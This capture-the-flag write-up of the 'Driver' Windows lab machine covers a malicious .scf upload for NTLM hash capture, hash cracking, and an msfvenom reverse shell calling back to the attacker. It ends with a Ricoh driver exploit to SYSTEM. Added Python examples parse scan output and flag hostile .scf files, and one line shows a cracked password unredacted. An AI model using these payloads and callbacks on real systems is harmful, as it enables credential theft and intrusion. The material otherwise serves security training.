
Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.238 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.95.238 -oN nmap_tcp -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
The Nmap scan shows four open ports. Port 80 is hosting an IIS web server, port 135 is running Windows RPC, port 445 is used for SMB, and port 5985 is running Microsoft Windows Remote Management (WinRM).
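The shell pipeline above builds $ports from every line of nmap's normal output that begins with a digit, so it also sweeps in the handful of filtered or closed ports nmap lists individually. As an added example (not code from the original writeup), the Python below parses the same output format while keeping the state column, and shows the difference between that naive list and one restricted to open ports. The sample scan text is constructed: it mirrors the scan above but adds a filtered and a closed line that the real scan did not contain.

```python
import re
from typing import NamedTuple

# Constructed sample in nmap's normal (-oN) format, modelled on the scan above but
# with two non-open lines added (139 filtered, 8080 closed) to show the caveat.
SAMPLE_NMAP = """\
Nmap scan report for 192.0.2.10
PORT     STATE    SERVICE      VERSION
80/tcp   open     http         Microsoft IIS httpd 10.0
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  filtered netbios-ssn
445/tcp  open     microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp closed   http-proxy
Service Info: Host: DRIVER; OS: Windows
"""


class PortLine(NamedTuple):
    port: int
    proto: str
    state: str      # open, closed, filtered, open|filtered, ...
    service: str
    version: str    # empty when nmap printed no version column


# <port>/<proto> <state> <service> [<version...>]
PORT_RE = re.compile(r"^(\d{1,5})/(tcp|udp|sctp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_port_lines(text: str) -> list[PortLine]:
    """Return every per-port line of an nmap normal-output report, with its state."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append(PortLine(int(port), proto, state, service, (version or "").strip()))
    return rows


def naive_port_list(text: str) -> str:
    """What `grep ^[0-9] | cut -d/ -f1` produces: every listed port, open or not."""
    return ",".join(str(r.port) for r in parse_port_lines(text))


def open_port_list(text: str, proto: str = "tcp") -> str:
    """The value you actually want in $ports: only ports nmap reported as open."""
    return ",".join(
        str(r.port) for r in parse_port_lines(text) if r.proto == proto and r.state == "open"
    )


if __name__ == "__main__":
    print("naive:", naive_port_list(SAMPLE_NMAP))   # 80,135,139,445,5985,8080
    print("open: ", open_port_list(SAMPLE_NMAP))    # 80,135,445,5985
```

In practice the difference only matters when nmap prints a few non-open ports explicitly (it collapses the majority into a "Not shown:" line), but feeding a closed or filtered port into the follow-up `-sC -sV` scan wastes time and can mislead the service table.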
HTTP
When we browse to port 80, we’re met with an HTTP basic authentication prompt. By trying a common set of credentials, we manage to log in with the username and password combination admin:admin.

The site explains that the MFP Firmware Update Centre performs different tests on printer firmware and drivers. Navigating to the Firmware Updates section, we can see what options are available.
It also notes that any uploaded firmware is placed on a file share and then reviewed manually by the internal team.

Because each uploaded file is placed on an SMB share and then manually reviewed, we may be able to take advantage of this by uploading a file that triggers a connection back to our own machine over SMB, letting us capture the reviewing user's NetNTLMv2 challenge-response. Since all files are opened during the review process, we can upload a Shell Command File (.scf) whose IconFile entry points at a share on our host, so the reviewer's machine requests the icon from us.
Start Responder.
sudo responder -w -I tun0
Next, we upload a .scf file containing the following:
[shell]
Command=2
IconFile=\\10.10.14.7\tools\nc.ico
[Taskbar]
Command=ToggleDesktop
After some time, we receive an NTLM hash belonging to the tony user.
<SNIP>
[SMB] NTLMv2-SSP Client : 10.129.95.238
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:45e3e02d68a6856b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
<SNIP>
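The .scf file works because Explorer resolves the IconFile path as soon as the folder containing the file is displayed, so any UNC path in it makes the reviewer's machine authenticate to that host. As an added example from the defensive side (not code from the original writeup), the Python below is a check a review workflow could run on each upload before anyone browses the share: it parses the INI-style shortcut formats Explorer resolves automatically and flags entries pointing at hosts outside an allowlist. The sample files, the documentation address 203.0.113.10 and the function names are constructed for this example.

```python
import configparser
import re
from dataclasses import dataclass
from pathlib import PurePath

# INI-style shortcut formats whose IconFile/URL targets Explorer resolves on folder
# display, before a reviewer deliberately opens anything.
AUTO_RESOLVING_EXTENSIONS = {".scf", ".url"}

# Matches a UNC path (\\host\share\...) and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")

# Constructed samples (not files from the original writeup).
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\203.0.113.10\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

BENIGN_SCF = r"""[Shell]
Command=2
IconFile=C:\Windows\System32\shell32.dll,3
[Taskbar]
Command=ToggleDesktop
"""


@dataclass(frozen=True)
class Finding:
    section: str
    key: str
    value: str
    host: str


def find_unc_references(text: str) -> list[Finding]:
    """Return every key whose value is a UNC path, with the host it points at."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key names as written (IconFile, not iconfile)
    parser.read_string(text)  # raises configparser.Error on malformed input
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            m = UNC_RE.match(value.strip())
            if m:
                findings.append(Finding(section, key, value.strip(), m.group(1)))
    return findings


def triage_upload(name: str, text: str, allowed_hosts: frozenset = frozenset()) -> dict:
    """Decide whether reviewers may browse a share containing this upload.

    Only the extension decides whether Explorer parses the file at all, so a .bin
    upload with SCF content is not resolved and passes; a .scf whose IconFile points
    at a host outside allowed_hosts (lowercase names) is held back.
    """
    verdict = {"name": name, "allow": True, "reasons": []}
    ext = PurePath(name).suffix.lower()
    if ext not in AUTO_RESOLVING_EXTENSIONS:
        return verdict
    try:
        findings = find_unc_references(text)
    except configparser.Error as exc:
        verdict["allow"] = False
        verdict["reasons"].append(f"unparseable {ext} content: {exc}")
        return verdict
    for f in findings:
        if f.host.lower() not in allowed_hosts:
            verdict["allow"] = False
            verdict["reasons"].append(
                f"[{f.section}] {f.key} resolves to external host {f.host}: {f.value}"
            )
    return verdict


if __name__ == "__main__":
    for name, body in (("fw_update.scf", SAMPLE_SCF), ("readme.scf", BENIGN_SCF)):
        print(triage_upload(name, body))
```

The check complements, rather than replaces, the network-level controls that stop this class of attack outright: blocking outbound SMB (445/tcp) at the perimeter and enforcing SMB signing and NTLM restrictions so a captured response is not usable elsewhere.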
We store the hash and run it through John to crack it, successfully recovering the plaintext password.
└──╼ $john tony_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l<SNIP>y (tony)
1g 0:00:00:00 DONE (2025-09-08 23:44) 33.33g/s 1092Kp/s 1092Kc/s 1092KC/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Alternatively, hashcat can be used to crack the hash:
└──╼ $hashcat --help | grep -i "ntlm"
<SNIP>
5600 | NetNTLMv2 | Network Protocol
<SNIP>
└──╼ $hashcat -m 5600 tony_hash /usr/share/wordlists/rockyou.txt
<SNIP>
TONY::DRIVER:45e3e02d68a6856b:7faa4732c<SNIP>00000000:l<SNIP>y
The hash is successfully cracked, giving us Tony’s credentials. We then check them with crackmapexec to confirm WinRM access on the target.
└──╼ $crackmapexec winrm 10.129.95.238 -u tony -p l<SNIP>y
<SNIP>
WINRM 10.129.95.238 5985 DRIVER [*] Windows 10 Build 10240 (name:DRIVER) (domain:DRIVER)
WINRM 10.129.95.238 5985 DRIVER [+] DRIVER\tony:liltony (Pwn3d!)
We connect to the remote machine via WinRM, where we find the user flag on Tony’s Desktop.
└──╼ $evil-winrm -i 10.129.95.238 -u tony -p l<SNIP>y
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
a4f3<SNIP>b418
Privilege Escalation
Now that we’ve got a shell on the target, we can pivot to a Meterpreter session, which is handy for hunting local privilege-escalation paths.
Generate a malicious executable that will call back to our machine and give us a shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=123 -f exe > shell.exe
Next, we configure a listener in msfconsole to catch the incoming connection.
sudo msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.7
set lport 123
run
We then upload shell.exe to the remote host through our WinRM session and run it to establish the connection.
*Evil-WinRM* PS C:\Users\tony> upload shell.exe
Info: Uploading /home/knuckl3s/Driver/shell.exe to C:\Users\tony\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony> .\shell.exe
Looking at msfconsole, we can confirm that a Meterpreter session has been established.
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 10.10.14.7:123
[*] Sending stage (203846 bytes) to 10.129.95.238
[*] Meterpreter session 1 opened (10.10.14.7:123 -> 10.129.95.238:49430) at 2025-09-09 00:00:44 -0500
(Meterpreter 1)(C:\Users\tony) > getuid
Server username: DRIVER\tony
Checking the running processes, we notice that we’re on session 0, which indicates the Meterpreter process is operating in a non-interactive, isolated service session.
(Meterpreter 1)(C:\Users\tony) > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
100 4692 shell.exe x64 0 DRIVER\tony C:\Users\tony\shell.exe
<SNIP>
3116 3092 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
<SNIP>
We migrate into a process such as explorer, which is running under session ID 1, indicating it’s an interactive session.
(Meterpreter 1)(C:\Users\tony) > migrate 3116
[*] Migrating from 100 to 3116...
[*] Migration completed successfully.
With a valid interactive Meterpreter session established, we can now run the Local Exploit Suggester module and review its findings. To do this, we background the current session (bg) and then run the following commands:
bg
use /multi/recon/local_exploit_suggester
set session 1
run
(Meterpreter 1)(C:\Windows\system32) > bg
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use /multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
[*] 10.129.95.238 - Collecting local exploits for x64/windows...
[*] 10.129.95.238 - 202 exploit checks are being tried...
[+] 10.129.95.238 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
[+] 10.129.95.238 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows 10 version 1507
[+] 10.129.95.238 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.95.238 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.129.95.238 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
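Suggester runs against an unpatched build like this one return many candidates at two different confidence levels: the "appears to be vulnerable" lines versus the "could not be validated" line. As an added example (not code from the original writeup or from Metasploit), the Python below parses such output into structured records and orders the candidates by context hints and check confidence, which is the triage the writeup does by eye. The sample lines are constructed from a subset of the module names above, with the documentation address 192.0.2.10 in place of a real target.

```python
import re
from typing import NamedTuple

# Constructed sample of local_exploit_suggester output (subset of the modules above,
# documentation address 192.0.2.10 in place of a real target).
SAMPLE_SUGGESTER = """\
[*] 192.0.2.10 - Collecting local exploits for x64/windows...
[*] 192.0.2.10 - 202 exploit checks are being tried...
[+] 192.0.2.10 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 192.0.2.10 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 192.0.2.10 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 192.0.2.10 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.0.2.10 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Running check method for exploit 48 / 48
"""


class Candidate(NamedTuple):
    module: str
    confidence: str   # "vulnerable", "unvalidated" or "other"
    detail: str       # any extra text the check printed after its verdict


# [+] <host> - <module>: <message>
RESULT_RE = re.compile(r"^\[\+\] (\S+) - ([^\s:]+): (.*)$")
VULNERABLE_PREFIX = "The target appears to be vulnerable."
UNVALIDATED_MARKER = "could not be validated"


def classify(message: str) -> tuple[str, str]:
    """Map the check's message to a confidence level plus any trailing detail."""
    if message.startswith(VULNERABLE_PREFIX):
        return "vulnerable", message[len(VULNERABLE_PREFIX):].strip()
    if UNVALIDATED_MARKER in message:
        return "unvalidated", ""
    return "other", message


def parse_suggester(text: str) -> list[Candidate]:
    """Turn the [+] result lines into Candidate records, preserving order."""
    out = []
    for line in text.splitlines():
        m = RESULT_RE.match(line)
        if not m:
            continue
        _host, module, message = m.groups()
        confidence, detail = classify(message)
        out.append(Candidate(module, confidence, detail))
    return out


def prioritise(cands: list[Candidate], hints: tuple[str, ...] = ()) -> list[str]:
    """Order modules: context hits first, then by confidence; input order otherwise."""
    rank = {"vulnerable": 0, "unvalidated": 1, "other": 2}

    def key(c: Candidate):
        hinted = any(h in c.module for h in hints)
        return (0 if hinted else 1, rank[c.confidence])

    return [c.module for c in sorted(cands, key=key)]


if __name__ == "__main__":
    cands = parse_suggester(SAMPLE_SUGGESTER)
    for module in prioritise(cands, hints=("print", "spool", "ricoh")):
        print(module)
```

Read from the defender's side, the length of the validated list is the finding: one Windows 10 1507 host with a permissive third-party printer driver directory carries a dozen independently exploitable local privilege escalations, and patching the build removes most of them at once.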
We’re provided with a list of potential exploits. Since the main website referenced printer software, our focus is on those related to printers. Another clue can be uncovered by checking the PowerShell history file.
*Evil-WinRM* PS C:\Users\tony> cat C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
<SNIP>
For Windows PowerShell (v5 and below), PowerShell history is saved in:
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
For PowerShell Core (pwsh, v6+), it is usually saved in:
C:\Users\tony\AppData\Roaming\Microsoft\PowerShell\PSReadLine\ConsoleHost_history.txt
The PowerShell history shows that a command was run to add a printer, and the driver in use is RICOH PCL6 UniversalDriver V4.23. From our list of potential exploits, we identify one named ricoh_driver_privesc.
We then run the following commands through our Meterpreter session to execute the exploit on the remote machine:
use exploit/windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set session 1
set lhost 10.10.14.7
run
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ricoh_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set lhost 10.10.14.7
lhost => 10.10.14.7
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer zIOyI...
[*] Sending stage (203846 bytes) to 10.129.95.238
[+] Deleted C:\Users\tony\AppData\Local\Temp\ZpFVz.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 2 opened (10.10.14.7:4444 -> 10.129.95.238:49431) at 2025-09-09 00:16:29 -0500
[*] Deleting printer zIOyI
(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
The exploit runs successfully, giving us a shell with NT AUTHORITY\SYSTEM privileges. From here, we can retrieve the root flag located on the Administrator’s Desktop.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
3552<SNIP>dfff